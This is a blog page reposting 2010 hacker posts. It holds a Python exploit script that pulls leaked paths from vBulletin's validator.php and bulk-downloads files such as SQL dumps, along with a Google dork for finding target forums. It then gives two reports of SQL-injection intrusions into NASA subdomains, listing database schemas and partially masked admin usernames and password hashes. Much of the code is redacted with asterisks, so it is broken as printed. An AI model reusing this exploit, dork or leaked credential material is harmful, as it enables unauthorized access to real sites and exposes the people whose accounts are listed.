Sunday, February 5, 2012

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    # Entry point of the published proof-of-concept: clears the terminal,
    # prints the banner, then dispatches on the first command-line argument.
    # NOTE(review): every span shown as ******** was redacted by the page, so
    # this listing is not valid Python as published; the redactions are kept
    # exactly as they appear.
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    # Both candidate commands are fixed strings, so nothing user-controlled
    # reaches os.system() here.
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    # Script name plus exactly two arguments (command and target), matching
    # the usage text above; anything else only prints the usage box.
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            # "scan" runs extract_parse_save(); the second command name is
            # redacted here (the usage text lists "download") and runs
            # download_data().
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        # The bare except also catches what Exception does not
        # (KeyboardInterrupt, SystemExit) and hides the cause.
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    # Blocks until Enter is pressed before the process exits.
    input() 
 
 
def extract_parse_save(url): 
    # "scan" step: requests <url>/validator.php, takes the text that follows
    # the literal "validate('" in the response, builds a second validator
    # request from that value, and saves the key/value pairs parsed from the
    # reply to a local file (file name redacted on this page).
    #
    # Defender note: every request made here targets validator.php under the
    # forum root. Requests for /validator.php in web access logs are the
    # signal to look for, and removing or blocking that file on production
    # installs closes this path.
    print("[+]********...") 
    hurl = url + "/validator.php" 
    # NOTE(review): the call is redacted; presumably urlopen(hurl), as in the
    # second request below - confirm.
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    # Drop everything up to and including the marker, so `source` starts at
    # the value that follows it.
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        # lastk/lastv hold the most recent key and value seen; a pair is
        # stored only once both are set, then both are reset.
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                # A result of -1 or 0 takes the first branch, anything else
                # the second; what is searched for is redacted.
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        # Entries are written in sorted key order.
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    # "download" step: opens a local file (name redacted; presumably the one
    # written by extract_parse_save - confirm), reads its first line as the
    # base URL, and starts one Download thread per requested file.
    print("[+]Searching and downloading files...") 
    # NOTE(review): 50 is assigned to a redacted name; presumably the
    # thread cap used in the wait loop below - confirm.
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        # Branches on the form of `files`; per the usage text a pattern such
        # as *.sql means "all matching", a plain name means one file.
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    # Busy-wait with no sleep while too many threads are
                    # alive; this spins a CPU core instead of blocking.
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    # Spin until the thread count is no longer above 1 (presumably only the
    # main thread left).
    while threading.********) > 1: 
        pass 
 
 
# Worker thread: fetches self.url and writes the response body to a local
# file. The base class is redacted; the explicit threading.Thread call in
# __init__ suggests it is threading.Thread.
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                # NOTE(review): the output file name is taken from a piece of
                # the parsed URL; whether it is sanitised is not visible
                # because the expressions are redacted.
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        # Bare except + pass: any failure (HTTP error, disk error, even
        # KeyboardInterrupt) is dropped silently, so a failed download leaves
        # no trace.
        except: 
            pass 
 
 
# Script entry guard (the left-hand side is redacted on this page): calls
# main() when the condition holds.
********"__main__": 
    main()


You need Python 3.1 to run this script!

TinKode-NASA 2 Websites Full Access


NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010
 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|
      #owned by c0de.breaker
I had access to:
www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov
Some screens:
http://i44.tinypic.com/vnjl10.png
http://i41.tinypic.com/25j9zle.png
http://i37.tinypic.com/294t26t.png
http://i35.tinypic.com/qnpf9y.png
http://i38.tinypic.com/23r5mw.png
http://i37.tinypic.com/2rfe92u.png
http://i35.tinypic.com/a57s5e.png
Information:
#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****
Tables from “*****” database:
#access
#branch
#docs
#docsbranch
#intro
#programs
Columns from “access” table:
#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp
Admins Accounts:
http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx
http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx
I didn’t want to damage anything, only to show that NASA subdomains have many vulnerabilities (SQLi, XSS, etc.).
#Finish, c0de.breaker

TinKode-NASA Full-Disclosure! AGAIN


NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010
 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker
#Important
Ok. First of all, the reason I made this SQLi public (even though I had no intention of doing so) is that I found out somebody else had discovered the vulnerable parameter. I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby, and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality, and it makes me sad. I feel alright about what I’m doing, because if anyone finds a vulnerability before me, he/she could use it in harmful ways such as shelling, rooting, backdooring, deleting, etc.
The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)
Testing:


Information:
#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
Also, magic_quotes_gpc is OFF, and the “user” from mysql has all privileges (so an injection in one application is not confined to that application’s own database):
Bad…
Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis
Tables from “ceosvis” database:
#instrument
#takes
#measurement
#contains
#mission
Tables from main Database:
#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement
I made this public because I saw the website was down, and I think the administrators will fix the vulnerability once someone reports the problem. (Sorry that I didn’t do this first, if that was the case.)